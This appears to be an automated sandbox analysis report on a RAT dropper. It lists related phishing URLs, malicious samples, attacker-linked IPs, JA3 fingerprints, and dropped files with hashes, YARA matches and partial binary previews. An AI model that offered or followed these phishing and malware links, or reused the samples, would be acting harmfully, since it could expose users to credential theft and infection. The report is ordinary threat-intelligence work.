                                                https://app.supercast.com/ahoy/messages/NuCwMXL7H9TYxRcbnPV2HNBC27R3XTJ7/click?signature=a81c8ff09c7aec0f320b61cbf7dd42e1a041100b&url=https://nursematte.com/asdbhewjcjfnjernfreddbecje/cloudflare-antibot#Kirsten.stevens+sueryder.orgGet hashmaliciousHTMLPhisherBrowse
                                                • 140.82.121.3
                                                5c683657-3d2b-5cd5-b372-9be474a3f97e.emlGet hashmaliciousUnknownBrowse
                                                • 140.82.112.3
                                                SecuriteInfo.com.Trojan.Siggen21.45671.28064.9687.exeGet hashmaliciousUnknownBrowse
                                                • 140.82.112.22
                                                SecuriteInfo.com.Trojan.Siggen21.45671.28064.9687.exeGet hashmaliciousUnknownBrowse
                                                • 140.82.112.21
                                                https://email.kmotortraiesde.com/Get hashmaliciousUnknownBrowse
                                                • 140.82.121.6
                                                https://anurenjm.github.io/NetflixCloneGet hashmaliciousHTMLPhisherBrowse
                                                • 140.82.114.18
                                                1U34vTVJ97.pdfGet hashmaliciousUnknownBrowse
                                                • 140.82.121.6
                                                SALSGIVERUSSolara.exeGet hashmaliciousXWormBrowse
                                                • 147.185.221.22
                                                XClient.exeGet hashmaliciousXWormBrowse
                                                • 147.185.221.22
                                                dsjjzgRwZe.exeGet hashmaliciousNjratBrowse
                                                • 147.185.221.22
                                                22.08.2024.exeGet hashmaliciousXmrigBrowse
                                                • 147.185.221.19
                                                Scan0030930930-pdf.jsGet hashmaliciousXWormBrowse
                                                • 147.185.221.21
                                                7shCdgBtEW.exeGet hashmaliciousNanocoreBrowse
                                                • 147.185.221.19
                                                testt.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                • 147.185.221.225
                                                SolaraBootstrapper.exeGet hashmaliciousXWormBrowse
                                                • 147.185.221.22
                                                iZ5oERbgGB.exeGet hashmaliciousNjratBrowse
                                                • 147.185.221.20
                                                file.exeGet hashmaliciousXWormBrowse
                                                • 147.185.221.20

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                3b5074b1b5d032e5620f69f9f700ff0eOnlineCrack_IDM.htaGet hashmaliciousUnknownBrowse
                                                • 185.199.109.133
                                                • 140.82.121.4
                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                • 185.199.109.133
                                                • 140.82.121.4
                                                oBHZZU8EYd.exeGet hashmaliciousBlank Grabber, DCRat, PureLog Stealer, Umbral Stealer, zgRATBrowse
                                                • 185.199.109.133
                                                • 140.82.121.4
                                                pxkGBmsm1Y.exeGet hashmaliciousDCRatBrowse
                                                • 185.199.109.133
                                                • 140.82.121.4
                                                https://www.wita.org/wp-login.php?action=rp&key=WIXXf8mMVxmBCgiJjzdZ&login=lfair%40USChamber.comGet hashmaliciousUnknownBrowse
                                                • 185.199.109.133
                                                • 140.82.121.4
                                                file.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                • 185.199.109.133
                                                • 140.82.121.4
                                                Order number HMFZ0772 [Order].exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 185.199.109.133
                                                • 140.82.121.4
                                                http://329e60-b9.myshopify.com/_t/c/A1020004-17EE30B00427829D-68C1B5C3/Get hashmaliciousUnknownBrowse
                                                • 185.199.109.133
                                                • 140.82.121.4
                                                http://y8oj.tonetrau.comGet hashmaliciousUnknownBrowse
                                                • 185.199.109.133
                                                • 140.82.121.4
                                                http://sp.zhabite.com/market/search/Get hashmaliciousUnknownBrowse
                                                • 185.199.109.133
                                                • 140.82.121.4

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\user\AppData\Local\Temp\Solara.exeSolara.exeGet hashmaliciousXWormBrowse
                                                  C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeVjy8d2EoqK.exeGet hashmaliciousBlank Grabber, DCRat, XWormBrowse
                                                    RdJ73GU3N1.exeGet hashmaliciousNjratBrowse
                                                      SolaraBootstrapper.exeGet hashmaliciousDCRat, XWormBrowse
                                                        QIjBj1l8We.exeGet hashmaliciousBlank GrabberBrowse
                                                          6tGWMkdYv4.exeGet hashmaliciousBlank GrabberBrowse
                                                            C:\Users\user\AppData\Roaming\sv_chost.exeSolara.exeGet hashmaliciousXWormBrowse

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Solara.exe.log

                                                              Download File
                                                              Process:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                              File Type:CSV text
                                                              Category:dropped
                                                              Size (bytes):654
                                                              Entropy (8bit):5.380476433908377
                                                              Encrypted:false
                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                              Malicious:false
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sv_chost.exe.log

                                                              Download File
                                                              Process:C:\Users\user\AppData\Roaming\sv_chost.exe
                                                              File Type:CSV text
                                                              Category:dropped
                                                              Size (bytes):654
                                                              Entropy (8bit):5.380476433908377
                                                              Encrypted:false
                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                              Malicious:false
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Neverlose.exe.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\Neverlose.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):522
                                                              Entropy (8bit):5.358731107079437
                                                              Encrypted:false
                                                              SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                                              MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                                              SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
                                                              SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                                              SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                                              Malicious:true
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SolaraBootstrapper.exe.log

                                                              Download File
                                                              Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):954
                                                              Entropy (8bit):5.350970057955659
                                                              Encrypted:false
                                                              SSDEEP:24:ML9E4KLE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKLHKnYHKh3oPtHo6hAHKzeR
                                                              MD5:3CE64235B0821B76294C3AD95F117E6C
                                                              SHA1:FD1EC471493CE132D0D719A9771739912BEF91BF
                                                              SHA-256:C5348C9009777CDF6C5CBD5D767A400932C0E1FA95F49DF8E797685754790850
                                                              SHA-512:DA80BE8655187998EB5425EC801E352C386891991A4575811DE365DFD38B1325DE95A540953EC6E9305E74B1A0560968729D742A01198540CFCC166635F104C5
                                                              Malicious:false
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.IO.Compression.FileSystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):64
                                                              Entropy (8bit):0.34726597513537405
                                                              Encrypted:false
                                                              SSDEEP:3:Nlll:Nll
                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                              Malicious:false
                                                              Preview:@...e...........................................................

                                                              C:\Users\user\AppData\Local\Temp\Log.tmp

                                                              Download File
                                                              Process:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):41
                                                              Entropy (8bit):3.7195394315431693
                                                              Encrypted:false
                                                              SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                              MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                              SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                              SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                              SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                              Malicious:false
                                                              Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r

                                                              C:\Users\user\AppData\Local\Temp\Solara.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\Neverlose.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):84480
                                                              Entropy (8bit):5.979998885001342
                                                              Encrypted:false
                                                              SSDEEP:1536:RGz2iTckU6TRXXUMCxA1M+bIJqqKHzIlt28A6EVbSOo9y+:cysO6THM+bIJaAQ84bSOos+
                                                              MD5:8AC3D32DDD136180B75C36A39398F39F
                                                              SHA1:D3F37C1CF6DEA9C9F1A17D2D3E2788CB71D13502
                                                              SHA-256:645697F87E53786ED389243B7C493452D1F4DDE157741BBE27D31F4BD87F833B
                                                              SHA-512:0174DF5E68D0EBCC9E736D5574F02C622C108DD16C097DC6D1DD4D61134B0BAC775C63A70D0AA739085E31F5DDC75DD7F51CD9A938C15EAC09F7278BFC1CC283
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Solara.exe, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Solara.exe, Author: ditekSHen
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 76%
                                                              Joe Sandbox View:
                                                              • Filename: Solara.exe, Detection: malicious, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................@..........N_... ...`....@.. ....................................@..................................^..W....`............................................................................... ............... ..H............text...T?... ...@.................. ..`.rsrc........`.......B..............@..@.reloc...............H..............@..B................0_......H....... `..........&.....................................................(....*.r...p*. ....*..(....*.r5..p*. q.%.*.s.........s.........s.........s.........*.r...p*. *p{.*.rg..p*. _..*.r...p*. C.?.*.rz..p*. .j..*.r...p*. ..].*..((...*.r<..p*.r...p*. ^p..*"(....+.*&(....&+.*.+5sZ... .... .'..o[...(,...~....-.(G...(9...~....o\...&.-.*.r...p*. ....*.rp..p*. .`..*.r...p*. .=T.*.rd..p*. .j..*.r...p*. I.;.*.rX..p*. ....*..............j..................s]..............~.........*

                                                              C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\Neverlose.exe
                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):13312
                                                              Entropy (8bit):4.677524556734161
                                                              Encrypted:false
                                                              SSDEEP:192:konexQO0FoAWyEfJkVIaqaLHmr/XKT0ifnTJ1jvVXctNjA:HnexHAWyEfJoIaqayzKAifd1LVEj
                                                              MD5:6557BD5240397F026E675AFB78544A26
                                                              SHA1:839E683BF68703D373B6EAC246F19386BB181713
                                                              SHA-256:A7FECFC225DFDD4E14DCD4D1B4BA1B9F8E4D1984F1CDD8CDA3A9987E5D53C239
                                                              SHA-512:F2399D34898A4C0C201372D2DD084EE66A66A1C3EAE949E568421FE7EDADA697468EF81F4FCAB2AFD61EAF97BCB98D6ADE2D97295E2F674E93116D142E892E97
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 33%
                                                              Joe Sandbox View:
                                                              • Filename: Vjy8d2EoqK.exe, Detection: malicious, Browse
                                                              • Filename: RdJ73GU3N1.exe, Detection: malicious, Browse
                                                              • Filename: SolaraBootstrapper.exe, Detection: malicious, Browse
                                                              • Filename: QIjBj1l8We.exe, Detection: malicious, Browse
                                                              • Filename: 6tGWMkdYv4.exe, Detection: malicious, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)............"...0..*...........I... ...`....@.. ....................................`.................................?I..O....`...............................H..8............................................ ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B................sI......H........'... ...........................................................0..;........r...p.(....(...............(...+}......~.......(......9...............(...+}.......}.......6}.......}...... ....}........0..{....+..}......~.......(...........,'.(......r'..p..(....(....(.......s....z..........(...+}.......~.......(....&......%.......%.......%..........+'.(......r=..p..(....(....(.......s....z..*6..(.........*....0...........(....o......rS..p(.........+8...........o..........

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ugvvhxt.lyu.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ev1tqld.l1u.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5vzdhcu5.bsp.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_atd1jsxf.kvm.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ayq3z1tu.h2a.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eoncgeei.oqr.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jxbqwczt.mz1.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfjejdlc.adx.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lfrdnhu4.tfy.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lgblpxtv.4nu.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_makhgzov.kur.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkdmvvwq.32z.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ouwzv3ft.res.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
